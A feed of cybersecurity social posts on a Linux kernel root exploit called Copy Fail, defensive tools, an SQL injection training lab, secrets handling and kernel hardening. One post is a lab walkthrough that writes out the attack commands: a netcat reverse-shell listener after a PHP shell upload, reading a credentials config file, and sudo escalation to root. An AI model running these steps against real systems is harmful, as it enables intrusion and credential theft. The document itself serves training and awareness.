This Linux bug gives you root without touching the file on disk. I ran CVE-2026-31431 on my main machine. 732 bytes of Python. Standard library. One execution. → root. No race condition. No crashes. No version-specific offsets. Just a clean, deterministic privilege escalation. Here is the part that should worry you. The exploit does not modify the binary. It writes 4 bytes into the page cache, the in-memory copy the kernel actually executes. So Tripwire sees nothing. AIDE sees nothing. Inotify sees nothing. Your file integrity monitoring is blind. This is not Dirty Cow. Not Dirty Pipe. Those were probabilistic. This is deterministic. Every single time. The root cause is subtle. - 2011: 𝘢𝘶𝘵𝘩𝘦𝘯𝘤𝘦𝘴𝘯 for IPsec ESN - 2015: 𝘈𝘍_𝘈𝘓𝘎 exposed to userspace - 2017: page cache optimization made it writable Each change made sense. Together, they created a privilege escalation sitting unnoticed for years. Now the part that should make you pause. This was found by an AI scanner in about 1 hour from a single prompt targeting the Linux crypto subsystem. This is not remote. You need initial access. But chain it with web RCE, stolen SSH creds, or a compromised container and you are done. We’re not just dealing with bugs anymore. We’re dealing with systems that can find them faster than we can reason about them. #Linux #CVE #KernelSecurity #PrivEsc #CyberSecurity #CopyFail

🚨 Recently, there are more incidents related to software supply chain attacks, especially in GitHub Actions. Originally developed during an active incident response involving malicious axios npm packages (1.14.1 & 0.30.4). My EM (Goutham Madhwaraj) asked me to review our workflows and check for potential risks from third-party actions. To make it faster, I built this tool: GitHub Actions Supply Chain Audit Tool 🔍 What it does: - Scan GitHub Actions workflows - Detect third-party / external actions - Flag risky usage (like unpinned versions) - Help quick security review Goal: 👉 Reduce manual effort 👉 Make audit faster 👉 Improve visibility on risks Sharing in case it’s useful: 👉 https://lnkd.in/gn8UzGke #CyberSecurity #DevSecOps #AppSec #SupplyChainSecurity #GitHubActions

I've been building a tool called Pulse. It's a Python-based Windows event log analyzer for threat detection. It reads .evtx log files, flags suspicious activity, and outputs a clean report. No enterprise SIEM license required. So far it detects 11 threat patterns, including brute force attempts, privilege escalation, antivirus being disabled, and suspicious service installations. It also correlates events into attack chains, like spotting when a brute force leads to a successful login followed by a new user account being created. 34 unit tests. CLI flags. HTML reports with color-coded severity. Still a lot on the roadmap, but I'm shipping features daily and learning how attacks actually work at the log level. Repo is public: https://lnkd.in/eaSm6Cmf #cybersecurity #blueteam #python #threatdetection #buildinpublic

I have just released a new project focused on one of the most persistent threats in web security: the SQL Injection Playground and Detection Engine. This platform is designed as a comprehensive educational tool for developers and security professionals to understand, detect, and mitigate SQLi vulnerabilities. The system integrates three core components to provide a complete learning lifecycle: Vulnerable Web Application: A Flask-based environment featuring intentional flaws in login and search functionalities to demonstrate real-world exploitation. Automated Detection Engine: A tool that employs pattern matching, error detection, and timing analysis to identify vulnerabilities automatically. Educational Dashboard: An interactive interface providing side-by-side comparisons between vulnerable string concatenation and secure parameterized queries. Key Technical Implementations:Attack Vectors: The engine successfully detects and demonstrates authentication bypass, UNION-based extraction, and time-based blind SQLi. Defensive Strategies: I have implemented and documented a 100% prevention rate using parameterized queries, input validation, and the principle of least privilege. Automated Reporting: The system generates detailed JSON logs and text-based security reports, simulating professional auditing workflows. This project was built using Python, Flask, and SQLite3 to serve as a hands-on training ground for those looking to strengthen their secure coding practices. Full Documentation and Source Code: https://lnkd.in/gBJVM2cq 👍 #CyberSecurity #AppSec #WebSecurity #Python #Flask #SQLInjection #InfoSec #SecureCoding #GitHub

TwoMillion Is the Machine That Proves You Don't Need a Single Exploit if You Just Know How to Read — JavaScript, API Responses, and Config Files Will Hand You Everything..(HTB) 👤 FuzzRaiders Team Member: Stager 🎯 Role: Internal Penetration Tester 🎓 Certified: CompTIA Security+ 📜 Certificate In Progress: PNPT (TCM Security) A JavaScript invite system. A hidden API. A forgotten .env file. Root via a kernel CVE. This lab shows how reading the application — not brute forcing it — unlocks every step of the chain, from invite code generation all the way to privilege escalation through CVE-2023-0386 (OverlayFS/FUSE), aligned with PNPT preparation. 🛠️ Focus Areas • JS Deobfuscation — unpacking eval() to find hidden API endpoints • API Abuse — IDOR to escalate is_admin without any authorization check • OS Command Injection — unsanitized username parameter → reverse shell 📘 Key Learning Outcomes • Read Before You Act — the answer is always in the code before it's in the response • IDOR Still Wins — trusting client-supplied privilege values is a systemic failure • Kernel CVEs Skip Everything — no sudo rule or file permission survives a vulnerable kernel 📂 Full Technical Write-up 🔗 GitHub: https://lnkd.in/d_hkNmiq This work is part of FuzzRaiders structured hands-on training and research program, where every lab, project, and technical study is formally documented, reviewed, and validated to ensure real-world applicability, methodological rigor and real-world security execution. #FuzzRaiders #CyberSecurity #WebSecurity #HackTheBox #PNPT #RedTeam #PenetrationTesting #Linux

🚀 Tip of the Day: Don’t Hardcode Secrets in Your Code One of the fastest ways to get hacked is this 👇 ❌ Writing things like: API_KEY = "123456789" DB_PASSWORD = "mypassword" If your code is pushed to GitHub (even by mistake), your secrets are exposed. ✅ Best Practice: Use Environment Variables Store sensitive data in a .env file instead: API_KEY=your_api_key_here DB_PASSWORD=your_password_here Then access them securely in your code. 💡 Example (Node.js): process.env.API_KEY 🔐 Bonus Tip: Always add your .env file to .gitignore so it never gets uploaded. --- Small mistake… big consequences. Build securely from day one. #TechTips #WebDevelopment #Programming #SoftwareEngineering #Developers #CyberSecurity

9 years. Thousands of engineers. Nobody noticed. One researcher connected three dots inside the Linux kernel — and what he found shook the entire security community. A 732-byte Python script now gives any local user instant root access on virtually every Linux machine released since 2017. No race condition. No special privileges. No traces left behind. It is called Copy Fail. CVE-2026-31431. The same week, a second vulnerability surfaced — Pack2TheRoot — letting unprivileged users install root-level software with zero authentication. It had been hiding for 14 years. The exploit is already public. The patch is already available. Is your infrastructure protected? Full technical breakdown in the article 👇 https://lnkd.in/d-Biwd8t #CyberSecurity #Linux #ZeroDay #CVE202631431 #InfoSec #PatchManagement #CloudSecurity

🚀Day 54/100 | 100 Days of OSCP&OSEP Knowledge — From Basics to Real Exploits FunboxEasyEnum walkthrough | weak web security + poor credential handling + improper sudo privileges 🔎 Phase 1 — Reconnaissance Started with Nmap scan: nmap -sCV -A --min-rate 1000 <target-ip> Key Findings: • 22 — SSH • 80 — Apache Web Server ➡️ Web application identified as the primary attack surface 🌐 Phase 2 — robots.txt Enumeration Checked robots file: curl -s http://<target-ip>/robots.txt ✔️ Found hint: Allow: Enum_this_Box ➡️ Indicated deeper enumeration required 📂 Phase 3 — Directory Enumeration feroxbuster -u http://<target-ip> -w /usr/share/wordlists/dirb/common.txt -x php,txt,html ✔️ Discovered: /mini.php ➡️ Exposed Zerion Mini Shell (file manager) 💥 Phase 4 — Exploitation (File Upload RCE) ✔️ No authentication required ✔️ No file validation Uploaded PHP reverse shell and executed: nc -lvnp 4444 ✔️ Reverse shell received whoami www-data 🔑 Phase 5 — Credential Discovery Read configuration file: cat /etc/phpmyadmin/config-db.php ✔️ Found plaintext credentials 🔄 Phase 6 — Credential Reuse Switched user: su karla ✔️ Login successful using reused password 🔓 Phase 7 — Privilege Escalation Checked sudo permissions: sudo -l ✔️ Found: (ALL) ALL 👑 Final Access sudo su whoami root ✔️ Full system compromise achieved 📺 YouTube: https://lnkd.in/deJ7DHmx 📸 Instagram: https://lnkd.in/gW9RgqHN 💬 Telegram: https://lnkd.in/dxT6s5pB ✍️ Medium: https://lnkd.in/diVViZHW Strong fundamentals = strong exploitation 🔥 #OSCP #CyberSecurity #EthicalHacking #RedTeam #Linux #RCE #PrivilegeEscalation #Infosec #100DaysOfOSCP

Six weeks ago, Pulse was a script that printed findings to a terminal. Today it is a full security platform with a web dashboard, live monitoring, fleet management, and the ability to block suspicious IPs directly from a browser. I built this while studying for my cybersecurity degree at WGU What Pulse does: - Reads Windows event logs and flags suspicious activity - Maps every finding to MITRE ATT&CK - Tracks security scores across multiple machines - Blocks malicious IPs directly to Windows Firewall from the dashboard - Sends alerts via email, Slack, or Discord - Generates PDF reports you can actually send to a manager 447 tests passing. 25 detection rules. Fully open source and free. If you are a student, a junior analyst, or an IT admin who wants visibility into your Windows machines without paying for enterprise tools, give it a try. GitHub: github.com/barrytd/Pulse Full writeup in the comments. #cybersecurity #blueteam #python #opensource #soc #siem #infosec #wgu

Copy Fail is generating a lot of buzz. What I think is important to know is an exploit would need to use the Linux kernel AF_ALG module. Disable that module and the path is blocked, but so is access to any shared hardware-backed cryptographic operations applications might need. Why would we want to disable a shared kernel capability, or basically any shared capability for that matter? Well, it gets back to security basics of compartmentalization and least (shared) code to enhance security. Any application or data that is important enough to require high security shouldn’t be sharing cryptographic libraries or other kernel resources at all. There should be strict separation. The architecture and engineering standards should match the requirements of the data and applications in the environment. What tends to be forgotten is you still have to go back and make sure unnecessary code/code paths are removed or disabled, even with physical separation. #cybersecurity #vulnerability #hardening #standards #practices https://lnkd.in/ez5eTvgf